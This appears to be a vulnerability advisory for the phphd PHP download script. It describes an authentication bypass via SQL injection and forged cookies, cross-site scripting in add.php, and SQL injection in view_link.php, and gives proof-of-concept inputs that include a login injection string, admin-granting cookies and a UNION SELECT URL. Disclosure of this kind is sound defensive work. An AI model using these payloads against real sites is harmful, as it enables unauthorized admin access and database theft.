Multiple Vulnerabilities in phphd

Description

Multiple Vulnerabilities found in phphd (http://www.hintondesign.org/downloads/view_cat.php?cat_id=91) script.

1. Authentication Bypass
Vulnerable script: check.php

There are two ways to bypass authentication:

a) SQL Injection
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies


2. Multiple Cross-Site Scripting
Vulnerable script: add.php
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.


3. Multiple SQL Injections
Vulnerable scripts: all scripts showing some data from database
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

PoC/Exploit

1. Authentication Bypass

a) SQL Injection
url: http://host/ht/login.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1
Cookie: email=aaa@aaa.com


2. Cross-Site Scripting Example.
Url: http://host/phphd/add.php
Download_name: <XSS>
Version: <XSS>
Download Description: <XSS>


3. SQL Injection Example:
http://host/phphd/view_link.php?file_id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Solution.

To fix this problem install or upgrade to latest version provided by vendor.

Company

• PC Evuln.com / II Evuln.com
• Email:
• skype: evuln.com
• Phone: +37068935936

Services

• Hack Repair
• Hack Insurance
• External Monitoring
• Pricing
• Partner Program

eVuln Labs

• Scanner Statistics
• eVuln Advisories
• Fixing Guide

eVuln Tools

• Malware Scanner
• PHP Code Scanner
• HTTP Packet Generator
• XSS String Encoder
• SQL String Encoder